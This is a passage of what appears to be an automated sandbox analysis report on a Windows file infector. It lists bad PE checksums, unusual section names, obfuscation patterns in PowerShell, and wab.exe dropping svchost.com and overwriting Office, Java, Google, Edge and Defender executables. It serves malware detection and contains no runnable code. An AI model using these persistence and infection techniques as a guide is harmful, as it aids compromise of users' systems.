PlanPHoarseEkspod Molli holdcOr Jump to behavior
Binary contains a suspicious time stamp
Source: AppVDllSurrogate.exe.8.dr Static PE information: 0x853858FE [Sun Oct 28 18:42:06 2040 UTC]
PE file contains an invalid checksum
Source: MpCmdRun.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x19b52e
Source: SQLDumper.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x49b60
Source: AdobeARMHelper.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x64c50
Source: pj11icon.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x142395
Source: Aut2exe_x64.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x1c7652
Source: AppSharingHookController64.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x20765
Source: GoogleUpdateCore.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x47eca
Source: NisSrv.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x307019
Source: AppVDllSurrogate.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x3d892
Source: pptico.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x3f5707
Source: visicon.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x2df46c
Source: dbcicons.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x2bad0
Source: AppVDllSurrogate64.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x4ec22
Source: UcMapi.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x132706
Source: osmclienticon.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x2584f
Source: outicon.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x91610
Source: msoev.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x268d3
Source: mpextms.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0xee9bf
Source: lyncicon.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0xea647
Source: jaureg.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x95cbf
Source: GoogleUpdate.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x36547
Source: OfficeScrSanBroker.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0xc392a
Source: javaw.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x5043b
Source: OfficeScrBroker.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0xa8883
Source: MsMpEng.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x39d03
Source: pubs.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x1452a5
Source: Au3Info.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x3d6d8
Source: aimgr.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x3b0de
Source: GoogleUpdateBroker.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x2e9ce
Source: ai.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0xc328b
Source: Au3Info_x64.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x49bdd
Source: PerfBoost.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x6ed59
Source: javaws.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x6c99c
Source: MpCmdRun.exe0.8.dr Static PE information: real checksum: 0x8a074 should be: 0x146cda
Source: aimgr.exe0.8.dr Static PE information: real checksum: 0x8a074 should be: 0x2e51b
Source: Common.DBConnection.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x2153c
Source: GoogleUpdateOnDemand.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x2e8fe
Source: SDXHelper.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x38c81
Source: upx.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x5c64b
Source: VC_redist.x64.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0xaff0b
Source: Au3Check.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x4ace1
Source: GoogleCrashHandler.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x60b44
Source: sscicons.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x2bad0
Source: armsvc.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x38ee8
Source: AppVLP.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x710ec
Source: GoogleCrashHandler64.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x739bf
Source: Integrator.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x44ae38
Source: Microsoft.Mashup.Container.Loader.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x218c6
Source: AppSharingHookController.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x25428
Source: AutoIt3Help.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x2942f
Source: Uninstall.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x1d811
Source: officeappguardwin32.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x1ea61e
Source: jusched.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0xc76e3
Source: AppVDllSurrogate32.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x3d892
Source: Wordconv.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x1f925
Source: jucheck.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x138baf
Source: OcPubMgr.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x182a45
Source: chrome.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x2c9d6
Source: accicons.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x4235e8
Source: VSTOInstaller.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x23068
Source: misc.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x109391
Source: ai.exe0.8.dr Static PE information: real checksum: 0x8a074 should be: 0xa200f
Source: MpDlpCmd.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x74f87
Source: java.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x5013a
Source: SciTE.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x25609f
Source: MpCopyAccelerator.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x3e54a
Source: ConfigSecurityPolicy.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x8624f
Source: integrator.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x44ae38
Source: Aut2exe.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x1997a9
Source: OLicenseHeartbeat.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0xb8fc4
Source: AutoIt3_x64.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x11706f
Source: joticon.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0xbd8e2
Source: grv_icons.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x646fd
Source: GoogleUpdateComRegisterShell64.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x3898a
PE file contains sections with non-standard names
Source: AppVDllSurrogate.exe.8.dr Static PE information: section name: .didat
Source: msoev.exe.8.dr Static PE information: section name: .didat
Source: OcPubMgr.exe.8.dr Static PE information: section name: .didat
Source: officeappguardwin32.exe.8.dr Static PE information: section name: .didat
Source: AppVDllSurrogate32.exe.8.dr Static PE information: section name: .didat
Source: OfficeScrBroker.exe.8.dr Static PE information: section name: .didat
Source: AppVDllSurrogate64.exe.8.dr Static PE information: section name: .didat
Source: OfficeScrSanBroker.exe.8.dr Static PE information: section name: .didat
Source: AppVLP.exe.8.dr Static PE information: section name: .didat
Source: Integrator.exe.8.dr Static PE information: section name: .didat
Source: Microsoft.Mashup.Container.Loader.exe.8.dr Static PE information: section name: .didat
Source: AppSharingHookController.exe.8.dr Static PE information: section name: .didat
Source: Common.DBConnection.exe.8.dr Static PE information: section name: .didat
Source: PerfBoost.exe.8.dr Static PE information: section name: .didat
Source: SDXHelper.exe.8.dr Static PE information: section name: .didat
Source: MpCmdRun.exe.8.dr Static PE information: section name: .didat
Source: MpDlpCmd.exe.8.dr Static PE information: section name: .didat
Source: mpextms.exe.8.dr Static PE information: section name: .didat
Source: MsMpEng.exe.8.dr Static PE information: section name: .didat
Source: NisSrv.exe.8.dr Static PE information: section name: .didat
Source: MpCmdRun.exe0.8.dr Static PE information: section name: .didat
Source: VC_redist.x64.exe.8.dr Static PE information: section name: .didat
Source: integrator.exe.8.dr Static PE information: section name: .didat
Source: ConfigSecurityPolicy.exe.8.dr Static PE information: section name: .didat
Source: MpCopyAccelerator.exe.8.dr Static PE information: section name: .didat
Source: UcMapi.exe.8.dr Static PE information: section name: .didat
Source: Wordconv.exe.8.dr Static PE information: section name: .didat
Source: ai.exe.8.dr Static PE information: section name: .didat
Source: aimgr.exe.8.dr Static PE information: section name: .didat
Source: chrome.exe.8.dr Static PE information: section name: .didat
Source: Au3Check.exe.8.dr Static PE information: section name: .didat
Source: Au3Info.exe.8.dr Static PE information: section name: .didat
Source: Au3Info_x64.exe.8.dr Static PE information: section name: .didat
Source: Aut2exe.exe.8.dr Static PE information: section name: .didat
Source: Aut2exe_x64.exe.8.dr Static PE information: section name: .didat
Source: upx.exe.8.dr Static PE information: section name: .didat
Source: AutoIt3Help.exe.8.dr Static PE information: section name: .didat
Source: ai.exe0.8.dr Static PE information: section name: .didat
Source: aimgr.exe0.8.dr Static PE information: section name: .didat
Source: OLicenseHeartbeat.exe.8.dr Static PE information: section name: .didat
Source: AppSharingHookController64.exe.8.dr Static PE information: section name: .didat
Source: AutoIt3_x64.exe.8.dr Static PE information: section name: .didat
Source: SciTE.exe.8.dr Static PE information: section name: .didat
Source: Uninstall.exe.8.dr Static PE information: section name: .didat
Source: AdobeARMHelper.exe.8.dr Static PE information: section name: .didat
Source: armsvc.exe.8.dr Static PE information: section name: .didat
Source: jaureg.exe.8.dr Static PE information: section name: .didat
Source: jucheck.exe.8.dr Static PE information: section name: .didat
Source: jusched.exe.8.dr Static PE information: section name: .didat
Source: VSTOInstaller.exe.8.dr Static PE information: section name: .didat
Source: SQLDumper.exe.8.dr Static PE information: section name: .didat
Source: accicons.exe.8.dr Static PE information: section name: .didat
Source: dbcicons.exe.8.dr Static PE information: section name: .didat
Source: grv_icons.exe.8.dr Static PE information: section name: .didat
Source: joticon.exe.8.dr Static PE information: section name: .didat
Source: lyncicon.exe.8.dr Static PE information: section name: .didat
Source: misc.exe.8.dr Static PE information: section name: .didat
Source: osmclienticon.exe.8.dr Static PE information: section name: .didat
Source: outicon.exe.8.dr Static PE information: section name: .didat
Source: java.exe.8.dr Static PE information: section name: .didat
Source: javaw.exe.8.dr Static PE information: section name: .didat
Source: javaws.exe.8.dr Static PE information: section name: .didat
Source: GoogleCrashHandler.exe.8.dr Static PE information: section name: .didat
Source: GoogleCrashHandler64.exe.8.dr Static PE information: section name: .didat
Source: GoogleUpdate.exe.8.dr Static PE information: section name: .didat
Source: GoogleUpdateBroker.exe.8.dr Static PE information: section name: .didat
Source: GoogleUpdateComRegisterShell64.exe.8.dr Static PE information: section name: .didat
Source: GoogleUpdateCore.exe.8.dr Static PE information: section name: .didat
Source: GoogleUpdateOnDemand.exe.8.dr Static PE information: section name: .didat
Source: pj11icon.exe.8.dr Static PE information: section name: .didat
Source: pptico.exe.8.dr Static PE information: section name: .didat
Source: pubs.exe.8.dr Static PE information: section name: .didat
Source: sscicons.exe.8.dr Static PE information: section name: .didat
Source: visicon.exe.8.dr Static PE information: section name: .didat
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B8A756B push ebx; iretd 2_2_00007FFD9B8A756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B8A74FB push ebx; iretd 2_2_00007FFD9B8A756A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07B408C2 push eax; mov dword ptr [esp], ecx 5_2_07B40AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07B40AB8 push eax; mov dword ptr [esp], ecx 5_2_07B40AC4

Persistence and Installation Behavior
barindex
Drops PE files with a suspicious file extension
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Windows\svchost.com Jump to dropped file
Drops executable to a common third party application directory
Source: C:\Program Files (x86)\Windows Mail\wab.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Infects executable files (exe, dll, sys, html)
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Users\user\AppData\Local\Temp\chrome.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe Jump to behavior
